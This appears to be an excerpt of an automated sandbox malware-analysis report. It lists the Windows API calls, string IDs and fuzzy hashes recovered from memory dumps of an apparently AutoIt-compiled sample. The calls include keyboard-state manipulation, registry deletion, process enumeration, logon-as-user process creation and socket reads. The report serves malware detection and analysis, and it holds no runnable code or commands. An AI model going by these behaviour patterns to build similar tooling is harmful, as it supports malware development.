                                  • Part of subcall function 00C63BCF: _wcscpy.LIBCMT ref: 00C63BF2
                                • CloseHandle.KERNEL32(00000000), ref: 00CC2320
                                • FreeLibrary.KERNEL32(00000000), ref: 00CC232F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                • String ID: @
                                • API String ID: 4082843840-2766056989
                                • Opcode ID: 6f5e8d547e4df9593b184da5250bdc269d5f63b1c4ffb5d1b00950800578b1f3
                                • Instruction ID: 9049bf8e7362519ae2d8d1c49ef2a33d0dc8e8ea5d18000757e22673c7d558ff
                                • Opcode Fuzzy Hash: 6f5e8d547e4df9593b184da5250bdc269d5f63b1c4ffb5d1b00950800578b1f3
                                • Instruction Fuzzy Hash: A771AD70A00619DFCF14EFA8C891AAEB7F5FF48310F148059E856AB361DB34AE41DB90
                                APIs
                                • GetParent.USER32(?), ref: 00CA481D
                                • GetKeyboardState.USER32(?), ref: 00CA4832
                                • SetKeyboardState.USER32(?), ref: 00CA4893
                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CA48C1
                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CA48E0
                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CA4926
                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CA4949
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 61861c8334706143268816bde02f3ccfdfe45fbb1c8a97b6c77abd08649a239a
                                • Instruction ID: db5a5c3e2d27f29d7e24589fabd4a4e06e5d599878a362f32cf3369c7207a3a8
                                • Opcode Fuzzy Hash: 61861c8334706143268816bde02f3ccfdfe45fbb1c8a97b6c77abd08649a239a
                                • Instruction Fuzzy Hash: 6351E6A05047D73DFB3A47348C45BBBBEAD5B87308F088589E1E5864C2C6D8EE94D751
                                APIs
                                • GetParent.USER32(00000000), ref: 00CA4638
                                • GetKeyboardState.USER32(?), ref: 00CA464D
                                • SetKeyboardState.USER32(?), ref: 00CA46AE
                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CA46DA
                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CA46F7
                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CA473B
                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CA475C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: c23ca31646bf67cf4854811d50ddfab5b43ab76c4143ad4e42d50caaa7d11019
                                • Instruction ID: f81bd1ca4dcc5e5d40ac22c44ab2c51ed0827e81321eefba854cfb5803e045d4
                                • Opcode Fuzzy Hash: c23ca31646bf67cf4854811d50ddfab5b43ab76c4143ad4e42d50caaa7d11019
                                • Instruction Fuzzy Hash: BF51C8A05047D73DFB3A87248C45BB67F995B87308F084489F1E5868C2D7D4ED94E761
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcsncpy$LocalTime
                                • String ID:
                                • API String ID: 2945705084-0
                                • Opcode ID: 4bb15222518c69c805524432d3bab1ee5fb6e0b549bf9c89c8b6ce28e4865e38
                                • Instruction ID: acf174004ca9023d879d94c505db3e3412625ee4513ca26f438da505100d5118
                                • Opcode Fuzzy Hash: 4bb15222518c69c805524432d3bab1ee5fb6e0b549bf9c89c8b6ce28e4865e38
                                • Instruction Fuzzy Hash: 0E417E75C102147ACB10FBF4C88BACFB7ACAF05314F548866E964F3162FA34E25587A9
                                APIs
                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00CFDBF0), ref: 00CB9409
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9416
                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00CB943A
                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00CB9452
                                • _strlen.LIBCMT ref: 00CB9484
                                • _memmove.LIBCMT ref: 00CB94CA
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB94F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLast$_memmove_strlenselect
                                • String ID:
                                • API String ID: 2795762555-0
                                • Opcode ID: 6f404efd90d3d41aedc24bcfbabf2f2e5a0ced07301de5156edc42bb8f4ead81
                                • Instruction ID: e906828ebd9d9e94ec005268f4aa7887098d220e94122eeb9f8a6c87401defae
                                • Opcode Fuzzy Hash: 6f404efd90d3d41aedc24bcfbabf2f2e5a0ced07301de5156edc42bb8f4ead81
                                • Instruction Fuzzy Hash: C1416075500205AFCB14EBA4CDD5FEEB7B9EF58314F208269F61697291DB30AE01DB60
                                APIs
                                • _memset.LIBCMT ref: 00CC9DB0
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC9E57
                                • IsMenu.USER32(?), ref: 00CC9E6F
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC9EB7
                                • DrawMenuBar.USER32 ref: 00CC9ED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$Item$DrawInfoInsert_memset
                                • String ID: 0
                                • API String ID: 3866635326-4108050209
                                • Opcode ID: cc28a74b4ee527112fa8c3e43b11fe671152f2f0532afd6d7a28808825b54e0e
                                • Instruction ID: 05a66427216f5dac4ab10f7c3b81c1bae11cfd790197569df308877b75400bf4
                                • Opcode Fuzzy Hash: cc28a74b4ee527112fa8c3e43b11fe671152f2f0532afd6d7a28808825b54e0e
                                • Instruction Fuzzy Hash: 78411676A00249EFDB20DF50D888F9ABBB4FF15354F04806DE965AB260D730EE51DB60
                                APIs
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00CC3C92
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC3CBC
                                • FreeLibrary.KERNEL32(00000000), ref: 00CC3D71
                                  • Part of subcall function 00CC3C63: RegCloseKey.ADVAPI32(?), ref: 00CC3CD9
                                  • Part of subcall function 00CC3C63: FreeLibrary.KERNEL32(?), ref: 00CC3D2B
                                  • Part of subcall function 00CC3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CC3D4E
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CC3D16
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                • String ID:
                                APIs
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CC8DF4
                                • GetWindowLongW.USER32(00DED170,000000F0), ref: 00CC8E27
                                • GetWindowLongW.USER32(00DED170,000000F0), ref: 00CC8E5C
                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CC8E8E
                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CC8EB8
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00CC8EC9
                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CC8EE3
                                Similarity
                                • API ID: LongWindow$MessageSend
                                • String ID:
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA1734
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA175A
                                • SysAllocString.OLEAUT32(00000000), ref: 00CA175D
                                • SysAllocString.OLEAUT32(?), ref: 00CA177B
                                • SysFreeString.OLEAUT32(?), ref: 00CA1784
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00CA17A9
                                • SysAllocString.OLEAUT32(?), ref: 00CA17B7
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                APIs
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                • lstrcmpiW.KERNEL32(?,?), ref: 00CA6A2B
                                • _wcscmp.LIBCMT ref: 00CA6A49
                                • MoveFileW.KERNEL32(?,?), ref: 00CA6A62
                                  • Part of subcall function 00CA6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CA6DBA
                                  • Part of subcall function 00CA6D6D: GetLastError.KERNEL32 ref: 00CA6DC5
                                  • Part of subcall function 00CA6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA6DD9
                                • _wcscat.LIBCMT ref: 00CA6AA4
                                • SHFileOperationW.SHELL32(?), ref: 00CA6B0C
                                Similarity
                                • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                • String ID: \*.*
                                APIs
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA180D
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA1833
                                • SysAllocString.OLEAUT32(00000000), ref: 00CA1836
                                • SysAllocString.OLEAUT32 ref: 00CA1857
                                • SysFreeString.OLEAUT32 ref: 00CA1860
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00CA187A
                                • SysAllocString.OLEAUT32(?), ref: 00CA1888
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                APIs
                                  • Part of subcall function 00C7C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                  • Part of subcall function 00C7C619: GetStockObject.GDI32(00000011), ref: 00C7C66B
                                  • Part of subcall function 00C7C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CCA13B
                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CCA148
                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CCA153
                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CCA162
                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CCA16E
                                Similarity
                                • API ID: MessageSend$CreateObjectStockWindow
                                • String ID: Msctls_Progress32
                                APIs
                                • GetClientRect.USER32(?,?), ref: 00C7C6C0
                                • GetWindowRect.USER32(?,?), ref: 00C7C701
                                • ScreenToClient.USER32(?,?), ref: 00C7C729
                                • GetClientRect.USER32(?,?), ref: 00C7C856
                                • GetWindowRect.USER32(?,?), ref: 00C7C86F
                                Similarity
                                • API ID: Rect$Client$Window$Screen
                                • String ID:
                                APIs
                                Similarity
                                • API ID: _memmove$__itow__swprintf
                                • String ID:
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00CC1B09
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00CC1B17
                                • __wsplitpath.LIBCMT ref: 00CC1B45
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcscat.LIBCMT ref: 00CC1B5A
                                • Process32NextW.KERNEL32(00000000,?), ref: 00CC1BD0
                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CC1BE2
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                • String ID:
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC2FA0
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC2FE0
                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CC3003
                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CC302C
                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CC306F
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC307C
                                Similarity
                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                • String ID:
                                APIs
                                Similarity
                                • API ID: _wcscpy$_wcscat
                                • String ID:
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00CA2AF6
                                • VariantClear.OLEAUT32(00000013), ref: 00CA2B68
                                • VariantClear.OLEAUT32(00000000), ref: 00CA2BC3
                                • _memmove.LIBCMT ref: 00CA2BED
                                • VariantClear.OLEAUT32(?), ref: 00CA2C3A
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CA2C68
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType_memmove
                                • String ID:
                                APIs
                                • GetMenu.USER32(?), ref: 00CC833D
                                • GetMenuItemCount.USER32(00000000), ref: 00CC8374
                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CC839C
                                • GetMenuItemID.USER32(?,?), ref: 00CC840B
                                • GetSubMenu.USER32(?,?), ref: 00CC8419
                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CC846A
                                Similarity
                                • API ID: Menu$Item$CountMessagePostString
                                • String ID:
                                APIs
                                • _memset.LIBCMT ref: 00CA552E
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA5579
                                • IsMenu.USER32(00000000), ref: 00CA5599
                                • CreatePopupMenu.USER32 ref: 00CA55CD
                                • GetMenuItemCount.USER32(000000FF), ref: 00CA562B
                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CA565C
                                Similarity
                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                • String ID:
                                • API String ID: 3311875123-0
                                • Opcode ID: 7e39d5ea9ef833a9b094bc6cecfe64aa46428a72de8f357198561e8c00a4ea87
                                • Instruction ID: 9616c3192c2f1a0e7703ad47058f5ab6cb1a36a33c64512ca692b7be7e7668f7
                                • Opcode Fuzzy Hash: 7e39d5ea9ef833a9b094bc6cecfe64aa46428a72de8f357198561e8c00a4ea87
                                • Instruction Fuzzy Hash: 0651BF70A00A4AEFDF20CF68D888BADBBF5AF5631CF548119F4259B291D3709A44CB51
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C7B1C1
                                • GetWindowRect.USER32(?,?), ref: 00C7B225
                                • ScreenToClient.USER32(?,?), ref: 00C7B242
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C7B253
                                • EndPaint.USER32(?,?), ref: 00C7B29D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                • String ID:
                                • API String ID: 1827037458-0
                                • Opcode ID: 71fe1fa99c006a0320c18ec50283469b355086ccd9cf969c21e147db8e1d2656
                                • Instruction ID: 9c1eb8dae64ab8cb1d7c2c77ecd86550acf034b1c4af761eb7e477177090afc0
                                • Opcode Fuzzy Hash: 71fe1fa99c006a0320c18ec50283469b355086ccd9cf969c21e147db8e1d2656
                                • Instruction Fuzzy Hash: 4841A075100300AFC721DF25DCC4F6A7BE8FB55320F144669FAAA8A2A2D7319D469B61
                                APIs
                                • ShowWindow.USER32(00D21810,00000000,?,?,00D21810,00D21810,?,00CDE2D6), ref: 00CCE21B
                                • EnableWindow.USER32(00000000,00000000), ref: 00CCE23F
                                • ShowWindow.USER32(00D21810,00000000,?,?,00D21810,00D21810,?,00CDE2D6), ref: 00CCE29F
                                • ShowWindow.USER32(00000000,00000004,?,?,00D21810,00D21810,?,00CDE2D6), ref: 00CCE2B1
                                • EnableWindow.USER32(00000000,00000001), ref: 00CCE2D5
                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CCE2F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Show$Enable$MessageSend
                                • String ID:
                                • API String ID: 642888154-0
                                • Opcode ID: 845d0adfd040b349918c34f95eafbd858e072f21e6ee1aa8897d2c6a49483eeb
                                • Instruction ID: 5f1a4ff24e48a70b5157da75fea01be2c24171d3bb78c1a9fd008dbff3a0467b
                                • Opcode Fuzzy Hash: 845d0adfd040b349918c34f95eafbd858e072f21e6ee1aa8897d2c6a49483eeb
                                • Instruction Fuzzy Hash: F4416D74601141EFDB26CF24C499F947BE9BB0B314F1841BDFA698F6A2C731AA41CB51
                                APIs
                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C9BCD9
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00C9BCE0
                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C9BCEF
                                • CloseHandle.KERNEL32(00000004), ref: 00C9BCFA
                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C9BD29
                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C9BD3D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                • String ID:
                                • API String ID: 1413079979-0
                                • Opcode ID: 50274f47c4d179212b922bacc534322016eb0ce177e10596ae5ef27184fe64e2
                                • Instruction ID: 7dd0044d376d17f259913445bc7b8bf7eb3dcd1f649b41221d3dd299c293b056
                                • Opcode Fuzzy Hash: 50274f47c4d179212b922bacc534322016eb0ce177e10596ae5ef27184fe64e2
                                • Instruction Fuzzy Hash: 7C216D72101249BBDF019FA9EE4DBEE7BA9EF04318F044014FA01AA160C776DE61DB60
                                APIs
                                  • Part of subcall function 00C7B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C7B5EB
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B5FA
                                  • Part of subcall function 00C7B58B: BeginPath.GDI32(?), ref: 00C7B611
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B63B
                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CCE9F2
                                • LineTo.GDI32(00000000,00000003,?), ref: 00CCEA06
                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCEA14
                                • LineTo.GDI32(00000000,00000000,?), ref: 00CCEA24
                                • EndPath.GDI32(00000000), ref: 00CCEA34
                                • StrokePath.GDI32(00000000), ref: 00CCEA44
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                • String ID:
                                • API String ID: 43455801-0
                                • Opcode ID: 8237018503f0b8bc0963cd71b209be630eb911b7c5e6518d1297d2ce750fbc1a
                                • Instruction ID: 9f0a420cee940475f792407de417bcec26c4bd8872d3ce7bf89002235f350f71
                                • Opcode Fuzzy Hash: 8237018503f0b8bc0963cd71b209be630eb911b7c5e6518d1297d2ce750fbc1a
                                • Instruction Fuzzy Hash: B411DB7600014DBFDF129F90DC88F9A7FADEB08364F048016FE1A99160D7719E56DBA0
                                APIs
                                • GetDC.USER32(00000000), ref: 00C9EFB6
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C9EFC7
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C9EFCE
                                • ReleaseDC.USER32(00000000,00000000), ref: 00C9EFD6
                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C9EFED
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 00C9EFFF
                                  • Part of subcall function 00C9A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00C9A79D,00000000,00000000,?,00C9AB73), ref: 00C9B2CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CapsDevice$ExceptionRaiseRelease
                                • String ID:
                                • API String ID: 603618608-0
                                • Opcode ID: e7f56d55d59147720b39b4fcb281d8197b1bbb5c6891fc8ae95c3566998f53da
                                • Instruction ID: d9f5f18fcb48252dcf7a13d156264e4bd04740ad19cc2d9c9600098dcb708a76
                                • Opcode Fuzzy Hash: e7f56d55d59147720b39b4fcb281d8197b1bbb5c6891fc8ae95c3566998f53da
                                • Instruction Fuzzy Hash: D901A7B5A00355BFEF109BE59C49B5EBFB8EB48351F004066FE05AB280D6719D00CF61
                                APIs
                                • __init_pointers.LIBCMT ref: 00C887D7
                                  • Part of subcall function 00C81E5A: __initp_misc_winsig.LIBCMT ref: 00C81E7E
                                  • Part of subcall function 00C81E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C88BE1
